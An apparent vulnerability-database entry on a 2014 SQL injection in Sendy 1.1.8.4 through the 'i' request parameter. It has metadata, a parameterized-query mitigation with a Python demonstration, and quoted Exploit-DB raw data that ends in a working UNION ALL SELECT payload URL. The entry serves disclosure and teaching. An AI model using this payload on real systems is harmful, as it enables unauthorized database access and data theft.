Vendor: Sendy
By: Hurley
CVSS: 9,3 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Sendy
Affected Version From: 1.1.8.4
Affected Version To: 1.1.8.4
Patch Exists: YES
Related CWE: N/A
CPE: a:sendy:sendy:1.1.8.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2014

Sendy SqlInject

This vulnerability allows an attacker to inject SQL into the application through the ‘i’ request parameter. With a ‘union all select’ clause the attacker can retrieve data from the database, for example the database server version through the ‘@@version’ system variable.

Mitigation:

The application should use parameterized queries to prevent SQL injection attacks.
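
The mitigation above as an added example (not Sendy's code and not from the exploit author): the concatenated query pattern beside a parameterized one with integer validation, run against the value of ‘i’ from the demo URL. Sendy is a PHP/MySQL application; this sketch assumes Python with an in-memory SQLite database so it runs offline, and the `items` table and all function names are hypothetical.

```python
import sqlite3

# Constructed sample input: the value of `i` from the demo URL, URL-decoded.
DEMO_I = ("1 union all select 1,2,3,4,5,6,@@version,8,9,10,11,12,"
          "13,14,15,16,17,18,19,20,21,22--")


def make_db():
    """In-memory stand-in database; table and column names are hypothetical."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO items VALUES (1, 'welcome')")
    return conn


def lookup_concat(conn, i):
    """The flawed pattern: `i` is pasted into the SQL text and parsed as SQL."""
    return conn.execute("SELECT id, title FROM items WHERE id = " + i).fetchone()


def lookup_param(conn, i):
    """Parameterized: `i` is bound as a value and never reaches the SQL parser."""
    return conn.execute("SELECT id, title FROM items WHERE id = ?", (i,)).fetchone()


def parse_id(i):
    """Defense in depth: accept only a short, plain decimal integer."""
    if not (i.isascii() and i.isdigit() and len(i) <= 10):
        raise ValueError("i must be a decimal integer")
    return int(i)


def lookup(conn, i):
    """Hardened handler: validate first, then bind."""
    return lookup_param(conn, parse_id(i))


if __name__ == "__main__":
    db = make_db()
    print(lookup(db, "1"))
    try:
        lookup_concat(db, DEMO_I)
    except sqlite3.Error as exc:
        # SQLite has no @@version, so the parser rejects the text; the error
        # itself shows the request value was interpreted as SQL.
        print("concatenated input was parsed as SQL:", exc)
    print(lookup_param(db, DEMO_I))  # bound as data: no matching row
```
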

Exploit-DB raw data:

# Exploit Title: Sendy SqlInject
# Date: 2014-02-24
# Exploit Author: Hurley
# Vendor Homepage: http://sendy.co/
# Software Link: http://sendy.co/
# Version: 1.1.8.4

Demo page:
http://server/app?i=1+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--